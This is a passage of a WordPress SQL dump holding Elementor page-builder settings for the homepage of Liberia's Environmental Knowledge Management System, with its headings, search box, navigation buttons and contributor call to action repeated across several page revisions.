a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(6080,548,'_elementor_version','2.7.5'),(6081,548,'_elementor_template_type','wp-page'),(6082,548,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(6085,549,'_wp_page_template','default'),(6086,549,'_elementor_edit_mode','builder'),(6087,549,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(6088,549,'_elementor_version','2.7.5'),(6089,549,'_elementor_template_type','wp-page'),(6090,549,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(6092,550,'_wp_page_template','default'),(6093,550,'_elementor_edit_mode','builder'),(6094,550,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All 